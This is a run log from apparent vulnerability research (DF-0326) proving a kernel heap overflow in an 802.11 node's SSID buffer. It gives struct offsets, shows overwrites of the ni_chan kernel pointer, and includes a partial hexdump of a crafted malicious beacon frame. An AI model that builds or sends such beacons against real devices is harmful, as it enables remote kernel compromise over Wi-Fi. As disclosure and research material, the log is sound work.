DF-0326 / run.log
===== node_overflow (code-level proof) ===== DF-0326: ieee80211_node SSID heap overflow -- code-level proof struct node_tail size = 136 bytes (LP64) Offsets (from start of node_tail): ni_esslen off=28 size=1 ni_essid[32] off=29 size=32 ni_rates off=61 size=16 ni_chan (POINTER) off=80 size=8 (kernel POINTER) ni_fhdwell off=88 size=2 ni_fhindex off=90 size=1 ni_erp off=92 size=2 ni_timoff off=94 size=2 ni_dtim_period off=96 size=1 ni_dtim_count off=97 size=1 ni_meshidlen off=98 size=1 ni_meshid[32] off=99 size=32 ni_essid -> ni_chan distance = 51 bytes => an SSID of length >= 59 fully overwrites ni_chan. === overflow with ssid_len = 32 (ni_esslen now 32) === ni_essid sink is 32 bytes wide; memcpy wrote 32 bytes -> 0 byte OVERFLOW ni_esslen off=28 size=1 intact ni_essid[32] off=29 size=32 [SINK] fits ni_rates off=61 size=16 intact ni_chan (POINTER) off=80 size=8 intact ptr=0xdeadbeef12345678 ni_fhdwell off=88 size=2 intact ni_fhindex off=90 size=1 intact ni_erp off=92 size=2 intact ni_timoff off=94 size=2 intact ni_dtim_period off=96 size=1 intact ni_dtim_count off=97 size=1 intact ni_meshidlen off=98 size=1 intact ni_meshid[32] off=99 size=32 intact === overflow with ssid_len = 48 (ni_esslen now 48) === ni_essid sink is 32 bytes wide; memcpy wrote 48 bytes -> 16 byte OVERFLOW ni_esslen off=28 size=1 intact ni_essid[32] off=29 size=32 [SINK] overflows past end ni_rates off=61 size=16 CLOBBERED ni_chan (POINTER) off=80 size=8 intact ptr=0xdeadbeef12345678 ni_fhdwell off=88 size=2 intact ni_fhindex off=90 size=1 intact ni_erp off=92 size=2 intact ni_timoff off=94 size=2 intact ni_dtim_period off=96 size=1 intact ni_dtim_count off=97 size=1 intact ni_meshidlen off=98 size=1 intact ni_meshid[32] off=99 size=32 intact ni_chan at offset 80 is BEYOND this ssid_len (77) -> not reached === overflow with ssid_len = 56 (ni_esslen now 56) === ni_essid sink is 32 bytes wide; memcpy wrote 56 bytes -> 24 byte OVERFLOW ni_esslen off=28 size=1 intact ni_essid[32] off=29 size=32 [SINK] overflows past end ni_rates off=61 size=16 CLOBBERED ni_chan (POINTER) off=80 size=8 CLOBBERED ptr=0xdeadbecccccccccc <-- ATTACKER-CONTROLLED KERNEL POINTER ni_fhdwell off=88 size=2 intact ni_fhindex off=90 size=1 intact ni_erp off=92 size=2 intact ni_timoff off=94 size=2 intact ni_dtim_period off=96 size=1 intact ni_dtim_count off=97 size=1 intact ni_meshidlen off=98 size=1 intact ni_meshid[32] off=99 size=32 intact ni_chan bytes after overflow (offset 80): ccccccccccbeadde <- 5/8 bytes of the channel pointer are attacker-controlled === overflow with ssid_len = 192 (ni_esslen now 192) === ni_essid sink is 32 bytes wide; memcpy wrote 192 bytes -> 160 byte OVERFLOW ni_esslen off=28 size=1 intact ni_essid[32] off=29 size=32 [SINK] overflows past end ni_rates off=61 size=16 CLOBBERED ni_chan (POINTER) off=80 size=8 CLOBBERED ptr=0xcccccccccccccccc <-- ATTACKER-CONTROLLED KERNEL POINTER ni_fhdwell off=88 size=2 CLOBBERED ni_fhindex off=90 size=1 CLOBBERED ni_erp off=92 size=2 CLOBBERED ni_timoff off=94 size=2 CLOBBERED ni_dtim_period off=96 size=1 CLOBBERED ni_dtim_count off=97 size=1 CLOBBERED ni_meshidlen off=98 size=1 CLOBBERED ni_meshid[32] off=99 size=32 CLOBBERED ni_chan bytes after overflow (offset 80): cccccccccccccccc <- 8/8 bytes of the channel pointer are attacker-controlled === overflow with ssid_len = 255 (ni_esslen now 255) === ni_essid sink is 32 bytes wide; memcpy wrote 255 bytes -> 223 byte OVERFLOW ni_esslen off=28 size=1 intact ni_essid[32] off=29 size=32 [SINK] overflows past end ni_rates off=61 size=16 CLOBBERED ni_chan (POINTER) off=80 size=8 CLOBBERED ptr=0xcccccccccccccccc <-- ATTACKER-CONTROLLED KERNEL POINTER ni_fhdwell off=88 size=2 CLOBBERED ni_fhindex off=90 size=1 CLOBBERED ni_erp off=92 size=2 CLOBBERED ni_timoff off=94 size=2 CLOBBERED ni_dtim_period off=96 size=1 CLOBBERED ni_dtim_count off=97 size=1 CLOBBERED ni_meshidlen off=98 size=1 CLOBBERED ni_meshid[32] off=99 size=32 CLOBBERED ni_chan bytes after overflow (offset 80): cccccccccccccccc <- 8/8 bytes of the channel pointer are attacker-controlled VERDICT: ni_essid[32] is overflowed by any Beacon whose SSID IE length byte exceeds 32. ni_rates (offset 32) and the ni_chan kernel POINTER (offset 51 from ni_essid) are both attacker-writable. ===== beacon_gen 192 > beacon.bin ===== DF-0326 beacon emitted: ssid_len=192 (>32 triggers the ni_essid[32] overflow; ni_rates + ni_chan pointer are clobbered). Total 192 SSID bytes attack-controlled. first 96 bytes of the crafted beacon (hexdump -C): 00000000 08 00 00 00 ff ff ff ff ff ff 00 11 22 33 44 55 |............"3DU| 00000010 00 11 22 33 44 55 00 00 00 00 00 00 00 00 00 00 |.."3DU..........| 00000020 64 00 01 04 00 c0 41 42 43 44 45 46 47 48 49 4a |d.....ABCDEFGHIJ| 00000030 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a |KLMNOPQRSTUVWXYZ| 00000040 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 |ABCDEFGHIJKLMNOP| 00000050 51 52 53 54 55 56 57 58 59 5a 41 42 43 44 45 46 |QRSTUVWXYZABCDEF| beacon.bin size: -rw-r--r-- 1 maxx maxx 239 Jul 1 16:09 beacon.bin --- decode: byte at offset 0x26 (38) is fc0 subtype, SSID IE tag+len at body offset 0x18..0x19 --- ===== live-kernel reachability probe ===== --- vulnerable symbols in /boot/kernel/kernel (T = live text) --- ffffffff8078c4c0 T ieee80211_add_scan ffffffff8077dc50 T ieee80211_init_neighbor ffffffff8077d1f0 T ieee80211_sta_join ffffffff8077c570 t ieee80211_sta_join1 --- SSID_INVALID status flag consumers (should be NONE) --- grep -c BPARSE_SSID_INVALID across the wlan tree: live kernel is closed-source; see env.txt host-side analysis --- 802.11 interfaces present (radio check) --- vtnet0 lo0 RUN_OK RUN_EXIT=0